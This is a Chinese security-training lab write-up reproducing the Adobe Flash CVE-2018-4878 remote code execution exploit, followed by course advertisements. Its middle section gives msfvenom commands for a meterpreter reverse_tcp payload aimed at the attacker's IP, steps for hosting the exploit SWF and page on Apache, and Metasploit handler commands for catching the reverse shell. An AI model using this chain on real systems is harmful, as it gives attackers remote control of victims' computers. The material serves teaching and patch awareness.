1/3
2/3
3/3
【陈鑫杰】“一点中招”的Adobe Flash 0day漏洞复现,红队高级渗透测试必备
拼客学院陈鑫杰
2020年10月05日 20:00
收录于文集
共28篇

1、漏洞概述

Adobe Flash 是全球流行的多媒体播放器,用户量高达数十亿,可以实现浏览器端丰富的内容展现,包括但不限于音视频、小游戏、交互内容等等。

尽管 Adobe 官方宣布接下来会逐步停止 Flash 插件的更新和维护,但不可否认的是,现行互联网上仍然有大规模的网站和浏览器客户端,仍然基于 Flash 来展现内容。

Adobe 与微软类似,这两家可以说是难兄难弟,经常喜提“漏洞全家桶”,近年来各种高危0day 漏洞满天飞。

毕竟“人红是非多”,这种用户量过亿的产品及漏洞,但凡有风吹草动,无论是明面上的「安全研究员」还是底下的「骇客」,都一定盯着不放。

这不,2018 年 2 月 1 号,Adobe 官方发布安全通报(APSA18-01),声明 Adobe Flash Player 28.0.0.137 及其之前的版本,存在高危漏洞(CVE-2018-4878)。

攻击者通过构造特殊的 Flash 链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被 Getshell,真正实现“一点中招”。在实际的Hacking工作中,无论是水坑还是鱼叉式攻击,这枚漏洞还是经常被用上。

直到2018年2月5号,Adboe才发布补丁来修复此 0 day 漏洞。

vx:pinginglab 官网:pinginglab.net

互联网上出现的基于此 Flash 0day 漏洞进行攻击的样本,其实在2017年底就已经由韩国计算机应急小组(KR-CERT)首次发现。也就是说,这枚漏洞其实已经被利用了很长一段时间,只不过之前官方一直没发现而已。

目前,全网已经有比较成熟的针对此 Flash 漏洞的利用代码,接下来我们一起来复现整个过程。

2、漏洞复现环境

渗透机:Kali Linux (ip:172.16.70.216) 

靶机:Windows 7 sp1 (ip:172.16.70.199) 

exp:cve-2018-4878.py 

flash:flashplayer_activex_28.0.0.137.exe

注1:为了节省大家实验时间,此测试环境已打包好。获取方式: 关注公众号[拼客学院服务号](搜索pinginglab),回复关键词:CVE-2018-4878

注2:实验环境仅供个人学习测试,为防止被河蟹,请勿转发链接。

vx:pinginglab 官网:pinginglab.net

3、实验流程

① 将网盘中的 CVE-2018-4878-master 目录下载下来,并放入 Kali Linux 桌面

vx:pinginglab 官网:pinginglab.net

②使用 msfvenom 生成 shell 代码

生成代码,其中lhost为kali的ip地址,lport为自定义的端口号

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888  -f  python>shellcode.txt

vx:pinginglab 官网:pinginglab.net 

查看代码文件  

root@kali:~# cat shellcode.txt

vx:pinginglab 官网:pinginglab.net

③ 进入 CVE-2018-4878-master 目录,编辑 CVE-2018-4878.py 文件

将上面 msfvenom 生成的代码覆盖掉原来的代码:

vx:pinginglab 官网:pinginglab.net 

修改 CVE-2018-4878.py 下面的文件信息(后面会用到,之后保存修改退出):  

vx:pinginglab 官网:pinginglab.net 

④ Kali Linux进入CVE-2018-4878-master 路径,用 Python 执行CVE-2018-4878-master.py代码

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py root@kali:~/Desktop/CVE-2018-4878-master# ls -l

vx:pinginglab 官网:pinginglab.net

⑤ Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf

vx:pinginglab 官网:pinginglab.net

此时,Kali Linux 上 Web 服务启动,并且具备 index2.html 这个页面。只要靶机启用 flash 并访问了这个页面,则可以直接被控制。

⑥Kali Linux开启Shell会话监听

使用handler监听模块   

msf > use exploit/multi/handler 

回弹一个tcp连接   

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 

设置kali渗透机的ip地址   

msf exploit(handler) > set lhost 172.16.70.216 

 设置监听端口,这个需跟上面msfvenom设置的端口一致   

msf exploit(handler) > set lport 8888 

开启监听,等待肉鸡上线 

msf exploit(handler) > exploit

vx:pinginglab 官网:pinginglab.net

⑦ Windows7 安装 flash 插件,并用 IE 浏览器访问页面

搜索 flash 最新的28版本  

vx:pinginglab 官网:pinginglab.net

安装flash插件

vx:pinginglab 官网:pinginglab.net

使用 Win7 内置 IE 8 浏览器访问页面:http://172.16.70.216/index2.html  

vx:pinginglab 官网:pinginglab.net

⑧ Kali Linux 上获取 meterpreter shell,并进行管理

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net 

实验总结:

可以看到,最终由于 Flash 存在 CVE-2018-4878 这个高危漏洞,导致 Windows 靶机访问含flash 的页面时,直接被 Kali Linux 控制。

真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果。

在这里呼吁大家:

平常要非常小心陌生链接,类似这种“一点就中招”的高级渗透攻击,肯定还有很多没有浮出水面。像这个 2017 年其实已经出现的漏洞,早就有黑客已经在使用了,而中招者完全不知情,整个攻击手法非常隐蔽。而 2018 年2月才有安全补丁,在这期间,有多少肉鸡被控制,这个难以想象。很多0day漏洞,黑客比大部分人都要提前知晓,在安全厂商没有出安全公告,或者没有打安全补丁的情况下,一个不小心,就会导致电脑被劫持,数据被窃取,造成极大的损失。

4、漏洞修复

① 直接到Adobe Flash官网,下载最新版本:https://get.adobe.com/cn/flashplayer/ 

② 安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。


【up主介绍】

  • 陈鑫杰 拼客科技CEO / 拼客学院院长

  • 多年一线互联网 / 金融 / 政府信息安全技术支撑

  • 擅长网络安全 / Web安全 / 渗透测试 / 数字取证

  • 网警技术顾问 / 多次协助抓获大型诈骗团伙

  • 腾讯安全合作伙伴 / 共同打击灰黑产非法犯罪

  • 51CTO金牌讲师 / 330万+学员 / 安全类Top1

  • 知乎专栏作家 / bilibili知识领域优质up主

  • 人邮签约作者 / 曾出版高等院校指定教材

【精选内容】

  • ① 关于网络安全行业的一切,如何成为一名合格的白帽子黑客?网络安全-Web安全-渗透测试必备指南 

  • ② 零基础如何学习Web安全渗透测试?推荐这份史上最详细的自学路线图! 

  • ③ 网络安全到底在干啥?搞网络安全就是搞“黑客技术”?聊聊网络安全的知识体系和学习方向

  • ④ B站最壕“搞机”?曝光百万级网络安全实验室!防火墙入侵防御漏洞扫描等都齐了! 

  • ⑤ 作为一名白帽子黑客,如何打造自己的网络安全“军火库”?

【精选班级】

  • ①《全栈渗透测试定向人才班》拼客学院 x 奇安信 | 直播 + 面授 网页链接

  • ②《100天晋升Web白帽子黑客》https://www.pinginglab.net/classroom/12/introduction

  • ③《全栈网络安全专家》https://www.pinginglab.net/classroom/11/introduction

【了解更多】

  • 班主任vx:qiuzhiquanquan、tangtangbzr(添加时请备注“B站”)

  • vx公众号:拼客学院服务号(ID:pinginglab) 拼客院长陈鑫杰(ID:pingsec)

  • 学院官网:www.pinginglab.net(专注网络安全/Python开发/Linux云计算/大数据)